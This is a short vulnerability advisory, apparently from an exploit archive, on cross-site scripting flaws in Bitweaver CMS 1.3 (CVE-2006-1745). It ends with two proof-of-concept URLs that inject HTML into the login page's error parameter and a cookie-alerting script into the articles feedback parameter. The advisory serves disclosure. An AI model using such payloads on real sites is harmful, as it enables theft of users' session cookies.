Bitweaver CMS 1.3 - Multiple Cross-Site Scripting Vulnerabilities



EKU-ID: 32857 CVE: CVE-2006-1745;OSVDB-24640 OSVDB-ID:
Author: KaDaL-X Published: 2006-04-07 Verified: Verified
Download:

Rating

☆☆☆☆☆
Home


source: https://www.securityfocus.com/bid/17406/info

Bitweaver CMS is prone to multiple cross-site scripting vulnerabilities. Thess issues are due to a failure in the application to properly sanitize user-supplied input.

An attacker may leverage these issues to have arbitrary script code executed in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks.

http://www.example.com/bitweaver/users/login.php?error=<h1><marquee>Test
http://www.example.com/[path_to_bitweaver]/articles/index.php?feedback=<script>alert(document.cookie)</script>